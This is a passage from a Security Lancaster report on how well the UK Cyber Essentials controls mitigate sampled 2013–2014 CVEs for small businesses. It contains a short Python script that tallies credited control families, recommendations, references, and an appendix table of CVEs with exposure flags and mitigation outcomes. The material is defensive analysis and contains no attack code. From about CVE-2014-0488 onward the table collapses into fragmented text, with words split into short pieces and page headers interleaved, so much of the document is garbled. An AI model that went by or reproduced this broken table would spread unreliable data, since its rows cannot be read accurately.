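vulnerability, in the style of the report's Cyber Controls Applicability table.

Added illustration, not the report's code: SAMPLE is a constructed set of rows
in the table's layout, and ALIASES is an assumed mapping of the table's
wording onto the five Cyber Essentials control families.
"""
from collections import Counter
from typing import Dict, List, NamedTuple

CONTROLS = ("Patch Management", "Secure Configuration", "Firewall",
            "Anti-Malware", "Access Control")

# Assumed: alternative labels the table uses for the same control family.
ALIASES = {
    "Strong Passwords": "Access Control",
    "Access Policy": "Access Control",
    "User Access": "Access Control",
    "Malware Protection": "Anti-Malware",
}


class Row(NamedTuple):
    cve: str
    exposed: List[bool]      # SME1, SME2, SME3, SME4, Idealised
    without_ce: str          # outcome with no Cyber Essentials controls
    with_ce: str             # Mitigated / Partially Mitigated / Not Mitigated
    controls: List[str]      # control families credited for the outcome


# Constructed sample rows (CVE | exposure flags | without CE | with CE | controls).
SAMPLE = """\
CVE-2013-0008 | y y y y y | Not Mitigated | Mitigated | Firewall; Secure Configuration (User Policy); Anti-Malware
CVE-2013-0140 | y n n n n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1140 | n n n n n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-2803 | n n n n n | Not Mitigated | Mitigated | Strong Passwords; Patch Management
"""


def canonical(control: str) -> str:
    """Map 'Secure Configuration (Secure Browser)' or an alias to its control family."""
    name = control.split("(")[0].strip()
    name = ALIASES.get(name, name)
    for family in CONTROLS:
        if name.startswith(family):
            return family
    return name


def parse_rows(text: str) -> List[Row]:
    """Parse pipe-separated rows in the sample layout into Row records."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        cve, flags, without_ce, with_ce, controls = [p.strip() for p in line.split("|")]
        rows.append(Row(cve,
                        [f == "y" for f in flags.split()],
                        without_ce,
                        with_ce,
                        [canonical(c) for c in controls.split(";")]))
    return rows


def control_coverage(rows: List[Row]) -> Dict[str, float]:
    """Fraction of vulnerabilities in which each control family is credited.

    Rows that remain 'Not Mitigated' with CE in place (the 'Don't install'
    cases) are not counted towards any control, since no CE control helps.
    """
    counts: Counter = Counter()
    for r in rows:
        if r.with_ce == "Not Mitigated":
            continue
        for family in set(r.controls):
            counts[family] += 1
    return {family: counts[family] / len(rows) for family in CONTROLS}


def exposure_by_network(rows: List[Row]) -> List[int]:
    """Number of sampled vulnerabilities each network is exposed to."""
    width = len(rows[0].exposed)
    return [sum(r.exposed[i] for r in rows) for i in range(width)]


def unmitigated(rows: List[Row]) -> List[str]:
    """CVEs for which Cyber Essentials offers no mitigation at all."""
    return [r.cve for r in rows if r.with_ce == "Not Mitigated"]


if __name__ == "__main__":
    data = parse_rows(SAMPLE)
    for family, share in control_coverage(data).items():
        print(f"{family:22s} credited in {share:.0%} of sampled vulnerabilities")
    print("Exposure per network (SME1..SME4, Idealised):", exposure_by_network(data))
    print("No CE mitigation:", unmitigated(data))
```

The same tally over the full appendix is what yields the per-control proportions quoted above; whether a "Partially Mitigated" row should count as fully as a "Mitigated" one is a scoring choice, and here both are counted.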
Recommendations
To further improve cyber-security across the UK, we recommend that:
1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.
2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.
3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.
References
[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.
[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.
[3] CESG, UK Trade & Investment, Prime Minister's Office 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.
[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.
[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list/, March 2015.
[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.
[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.
[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.
[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.
[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.
[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.
[12] Mitre.org. CVE-2014-0160 aka heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.
[13] Mitre.org. CVE-2014-6271 aka shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.
[14] Mitre.org. CVE-2015-2077 aka superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.
[15] Netcraft. Half a million widely trusted websites vulnerable to heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.
[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.
[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

Columns: CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | Controls credited
(y = network exposed to the vulnerability, n = not exposed)

CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated | User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | m | Not Mitigated | Mitigated | Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated | Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated | Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated | Boundary Firewalls (include anti-DOS)
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated | Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated | Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated | Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-38
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
ti-D
os
Fir
mw
are
Up
dat
esC
VE
-20
14
-38
72
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
namp
Pat
chM
anag
emen
tC
VE
-20
14
-40
44
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-40
79
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
08
2y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
00
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
10
5y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
14
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eC
VE
-20
14
-41
27
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-41
32
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-4
13
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 17 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
